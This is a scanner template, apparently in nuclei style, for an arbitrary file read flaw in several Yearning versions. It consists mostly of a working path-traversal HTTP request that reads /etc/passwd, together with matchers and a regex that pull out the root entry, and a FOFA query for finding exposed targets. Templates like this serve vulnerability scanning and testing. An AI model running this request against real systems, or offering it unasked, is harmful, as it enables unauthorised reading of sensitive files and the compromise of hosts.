## id: VEID-2024-0109
## name: Yearning_front任意文件读取
## author: hack007x
## severity: critical
## tags: veid,file,veid2024
## description:该系统Yearning 2.3.1 版本、Interstellar GA 2.3.2 版本和 Neptune 2.3.4 -2.3.6 版本存在任意文件读取漏洞。攻击者可以利用该漏洞获取敏感信息。
## fofa-query: app="Yearning"
## verification: true



GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: body matches /root:[^:]*:[0-9]+:[0-9]+:/
#> extract: name=etc_passwd, from=body, regex=/(root:[^:]*:[0-9]+:[0-9]+:[^:]*:[^:]*:\/[^\n]+)/, group=1





# @VEIL-STAMP: 1296bb091897142793f50c6a9f2f84266d0cbf848734a948feeb4f7be2787ba5
